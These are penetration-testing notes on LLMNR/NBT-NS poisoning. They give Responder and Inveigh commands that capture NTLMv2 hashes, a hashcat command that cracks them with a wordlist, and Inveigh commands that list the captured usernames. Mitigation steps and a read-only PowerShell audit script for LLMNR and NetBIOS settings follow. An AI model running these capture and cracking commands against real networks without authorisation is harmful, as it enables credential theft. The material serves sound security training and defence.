
LLMNR Poisoning

From Linux


https://github.com/SpiderLabs/Responder

sudo responder -I eth0 
Wait for hashes to come in, then crack them with:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

From Windows


Using Inveigh

https://github.com/Kevin-Robertson/Inveigh

Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe
We can quickly view unique captured hashes by typing GET NTLMV2UNIQUE. We can type in GET NTLMV2USERNAMES and see which usernames we have collected. This is helpful if we want a listing of users to perform additional enumeration against and see which are worth attempting to crack offline using Hashcat.

Mitigation


  1. Select "Turn OFF multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor
  2. Disable NBT-NS: navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBIOS over TCP/IP". If you cannot disable for whatever reason
  3. Require Network Access Control (NAC)
  4. Require strong passwords: over 14 characters with capitals and symbols and no common words. The better the password, the longer it takes an attacker to crack the hash
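
To confirm that mitigation steps 1 and 2 actually took effect on a host, the following read-only audit is an added example (not part of the original notes). It assumes the standard registry locations Windows uses for these settings: the EnableMulticast policy value for LLMNR and the per-interface NetbiosOptions value for NetBIOS over TCP/IP. The function names are hypothetical.

```powershell
# Added audit example: verifies mitigation steps 1 and 2 on the local host.
# Read-only; it changes no settings. Function names are illustrative.

function Test-LlmnrDisabled {
    # The "Turn off multicast name resolution" policy writes EnableMulticast = 0 here.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    $value = (Get-ItemProperty -Path $key -Name EnableMulticast `
              -ErrorAction SilentlyContinue).EnableMulticast
    [pscustomobject]@{
        Check    = 'LLMNR (multicast name resolution)'
        Target   = 'DNSClient policy'
        Value    = if ($null -eq $value) { 'not set' } else { $value }
        Disabled = ($value -eq 0)   # a missing value means LLMNR is still on
    }
}

function Test-NetbiosDisabled {
    # One subkey per interface (Tcpip_{GUID}).
    # NetbiosOptions: 0 = follow DHCP, 1 = enabled, 2 = disabled.
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
        $opt = (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions `
                -ErrorAction SilentlyContinue).NetbiosOptions
        [pscustomobject]@{
            Check    = 'NBT-NS (NetBIOS over TCP/IP)'
            Target   = $_.PSChildName
            Value    = if ($null -eq $opt) { 'not set' } else { $opt }
            Disabled = ($opt -eq 2)  # 0 can still enable NetBIOS via DHCP
        }
    }
}

$results = @(Test-LlmnrDisabled) + @(Test-NetbiosDisabled)
$results | Format-Table -AutoSize

# Non-zero exit code lets a compliance job or scheduled task flag the host.
$exposed = @($results | Where-Object { -not $_.Disabled })
if ($exposed.Count -gt 0) {
    Write-Warning "$($exposed.Count) setting(s) still allow LLMNR/NBT-NS name resolution."
    exit 1
}
```

An interface reporting NetbiosOptions 0 is counted as not disabled because a DHCP server can still turn NetBIOS on for it.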